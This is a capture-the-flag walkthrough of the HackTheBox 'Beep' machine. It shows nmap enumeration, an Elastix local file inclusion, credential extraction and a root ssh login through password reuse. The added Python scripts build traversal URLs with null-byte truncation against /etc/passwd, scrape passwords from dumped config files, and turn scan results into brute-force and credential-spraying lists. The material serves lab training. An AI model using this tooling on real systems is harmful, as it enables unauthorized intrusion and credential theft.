Beep Walkthrough

Hey Everyone! Here we are back with another HackTheBox machine, "Beep". Before we get started, let's look at the machine's info

It's rated easy and runs Linux, so let's get started…

Service Enumeration

First we use nmap to find the open ports, the services running on them, the OS version, and whatever else its scripts report

> nmap -A -T4 -oG beep.gnmap 10.10.10.7
-A: service/version detection, OS detection, traceroute and the default NSE scripts
-T4: the "aggressive" timing template, which shortens timeouts to speed the scan up (it is not a thread count)
-oG: also write greppable output to beep.gnmap, the format tools such as brutespray read to brute-force the discovered services

The result is

Nmap scan report for 10.10.10.7
Host is up (0.20s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: STLS AUTH-RESP-CODE LOGIN-DELAY(0) IMPLEMENTATION(Cyrus POP3 server v2) USER UIDL RESP-CODES APOP TOP PIPELINING EXPIRE(NEVER)
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: UIDPLUS ANNOTATEMORE ACL IDLE OK THREAD=ORDEREDSUBJECT CATENATE LISTEXT LITERAL+ X-NETSCAPE ATOMIC CONDSTORE LIST-SUBSCRIBED URLAUTHA0001 ID MAILBOX-REFERRALS THREAD=REFERENCES IMAP4 IMAP4rev1 NAMESPACE NO SORT=MODSEQ UNSELECT STARTTLS SORT RENAME RIGHTS=kxte BINARY QUOTA MULTIAPPEND Completed CHILDREN
443/tcp   open  ssl/https?
|_ssl-date: 2020-12-08T14:07:56+00:00; +3h02m01s from scanner time.
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Host script results:
|_clock-skew: 3h02m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

More than one port is open, which gives us several possible entry points into this machine, but we will work on just one of them. Take notes on this output (the legacy versions of OpenSSH, Cyrus and Webmin, and the roughly three-hour clock skew, may matter later) and let's continue…
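The -oG flag was chosen above so that a brute-forcer can consume the scan. As an added example (not part of the original write-up), here is a small Python parser for that greppable output that lists the open services a password-spraying tool could attack; the gnmap text is a constructed sample mirroring the scan result on this page, not a real capture.

```python
import re

# Constructed sample of the greppable (-oG) file nmap writes as beep.gnmap.
# The port list mirrors the scan above; the layout is nmap's own: tab-separated
# fields, and each port as port/state/proto/owner/service/rpcinfo/version/
# (nmap swaps any '/' inside a version string for '|' to keep this parseable).
SAMPLE_GNMAP = """# Nmap 7.91 scan initiated Tue Dec  8 11:05:00 2020 as: nmap -A -T4 -oG beep.gnmap 10.10.10.7
Host: 10.10.10.7 ()\tStatus: Up
Host: 10.10.10.7 ()\tPorts: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/, 25/open/tcp//smtp//Postfix smtpd/, 80/open/tcp//http//Apache httpd 2.2.3/, 110/open/tcp//pop3//Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4/, 111/open/tcp//rpcbind//2 (RPC #100000)/, 143/open/tcp//imap//Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4/, 443/open/tcp//ssl|https?///, 993/open/tcp//ssl|imap//Cyrus imapd/, 995/open/tcp//pop3//Cyrus pop3d/, 3306/open/tcp//mysql//MySQL (unauthorized)/, 4445/open/tcp//upnotifyp?///, 10000/open/tcp//http//MiniServ 1.570 (Webmin httpd)/\tIgnored State: closed (988)
# Nmap done at Tue Dec  8 11:06:00 2020 -- 1 IP address (1 host up) scanned in 60.00 seconds
"""

# One port entry: port/state/proto/owner/service/rpcinfo/version/
PORT_ENTRY = re.compile(r"(\d+)/([^/]+)/([^/]+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")

# Protocols that password-spraying tools (brutespray, hydra, medusa) attack directly.
BRUTEFORCEABLE = {"ssh", "ftp", "telnet", "smtp", "pop3", "imap", "mysql",
                  "postgresql", "smb", "vnc", "rdp"}


def parse_gnmap(text):
    """Return one dict per port entry found in greppable nmap output."""
    entries = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # The Ports field ends at the next tab (Ignored State, OS, Seq Index...).
        ports_field = line.split("Ports:", 1)[1].split("\t")[0]
        for port, state, proto, _owner, service, _rpc, version in PORT_ENTRY.findall(ports_field):
            entries.append({"host": host, "port": int(port), "proto": proto,
                            "state": state, "service": service, "version": version})
    return entries


def brute_targets(entries):
    """'host:port:service' for open ports whose protocol a brute-forcer understands.

    'ssl|imap' becomes 'imap' and a trailing '?' (unconfirmed guess) is dropped,
    so TLS-wrapped and guessed services are still considered.
    """
    targets = []
    for e in entries:
        if e["state"] != "open":
            continue
        protocol = e["service"].split("|")[-1].rstrip("?")
        if protocol in BRUTEFORCEABLE:
            targets.append(f"{e['host']}:{e['port']}:{protocol}")
    return targets


if __name__ == "__main__":
    parsed = parse_gnmap(SAMPLE_GNMAP)
    for e in parsed:
        print(f"{e['port']:>5}/{e['proto']} {e['state']:<6} {e['service']:<12} {e['version']}")
    print("\nbrute-force candidates:")
    for t in brute_targets(parsed):
        print(" ", t)
```

On the sample this yields seven targets (ssh, smtp, pop3, imap twice, pop3 over TLS and mysql); http, rpcbind and the unidentified port 4445 are left out because a generic password sprayer has nothing to log in to there.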

Website Enumeration

Opening http://10.10.10.7 redirects us to https://10.10.10.7, where we land on a login portal, as you can see here

Let's look for an entry point, such as a CMS that may have known vulnerabilities; start by viewing the page source

Now we have two keywords to search exploits for: elastix and palosanto. Searching for palosanto turned up nothing, so let's search for elastix with searchsploit

As you can see there are multiple exploits; we will go with the easiest one, the LFI, and see where it leads us. Open the link and you will find the exploit code like this

Now we have the full LFI link; after accessing it

we have usernames and passwords, but the rendered page is hard to read, so view the page source and search for "password". You will find the password; keep it, we will need it

So for now we have the username root and the password we found above. That password belongs to an application account, but administrators often reuse passwords, so it is worth trying against root as well.
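The two steps above (build the traversal link, then dig the credentials out of the unreadable page and decide which logins to try) are shown below as an added example in Python; this is not the original write-up's code or the exploit from searchsploit. The script name page.php and parameter name file are placeholders (take the real ones from the exploit entry), and the included config file is a constructed sample with placeholder values.

```python
import html
import re
from urllib.parse import quote


def lfi_url(base, param, target, depth=8, null_byte=True):
    """Build the traversal URL for a file-inclusion parameter.

    depth '../' segments climb to '/' from wherever the script lives (extra ones
    are harmless, so err high). The trailing %00 truncates whatever suffix the
    application appends (e.g. '.php'); that trick only works on PHP < 5.3.4, so
    pass null_byte=False for newer targets.
    """
    traversal = "../" * depth + target.lstrip("/")
    payload = quote(traversal, safe="/") + ("%00" if null_byte else "")
    sep = "&" if "?" in base else "?"
    return f"{base}{sep}{param}={payload}"


# KEY=value lines as they appear in a dumped config file.
CONF_LINE = re.compile(r"^\s*([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.+?)\s*$")


def extract_credentials(body):
    """Return {KEY: value} for config lines whose key names a user or password.

    The included file comes back embedded in the page's HTML, which is why it is
    unreadable in the browser: strip the tags, decode entities, then walk the
    lines (view-source keeps the original line breaks). '# ...' comments are
    skipped so commented-out defaults are not mistaken for live credentials.
    """
    text = html.unescape(re.sub(r"<[^>]+>", "\n", body))
    creds = {}
    for line in text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        m = CONF_LINE.match(line)
        if m and re.search(r"USER|PASS|PWD|SECRET", m.group(1), re.I):
            creds[m.group(1)] = m.group(2)
    return creds


def candidate_logins(creds, extra_users=("root",)):
    """Pair every discovered username (plus root) with every discovered password.

    Service passwords are frequently reused for system accounts, which is the bet
    this walkthrough makes with root; this returns the full list worth trying.
    """
    users = set(extra_users) | {v for k, v in creds.items() if re.search(r"USER", k, re.I)}
    passwords = {v for k, v in creds.items() if re.search(r"PASS|PWD|SECRET", k, re.I)}
    return sorted((u, p) for u in users for p in passwords)


# Constructed sample of what "view source" shows after the include: a
# key=value config file wrapped in the page's HTML. All values are placeholders.
SAMPLE_BODY = """<html><body>
# database and manager settings (constructed sample, not a real file)
DBHOST=localhost
DBENGINE=mysql
DBUSER=dbadmin
DBPASS=ExampleDbPass1
MGRUSER=manager
MGRPASS=ExampleMgrPass2
# DBNAME=app
ADMIN_USERNAME=webadmin
ADMIN_PASSWORD=Example&amp;Pass4
</body></html>"""


if __name__ == "__main__":
    # Hypothetical script and parameter names; take the real ones from the searchsploit entry.
    print(lfi_url("https://10.10.10.7/page.php", "file", "/etc/passwd"))
    found = extract_credentials(SAMPLE_BODY)
    for key, value in found.items():
        print(f"{key} = {value}")
    print(len(candidate_logins(found)), "user/password pairs to try over ssh")
```

The null-byte detail is the one to check first when a traversal link returns an empty page: if the application appends an extension and the PHP version is recent, the %00 no longer cuts it off and the include silently fails.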

If you remember from the nmap scan, port 22 (ssh) is open, so we will try to log in to the server with the credentials we have

ssh root@10.10.10.7 (or ssh 10.10.10.7). At first I faced a problem with ssh itself, as you can see here, and after some searching I found the solution here

After resolving the problem, we're logged in as root over ssh :) let's search for the flags…

The root flag is in /root and the user flag is in /home/fanis

Congrats ❤

Stay in touch :)
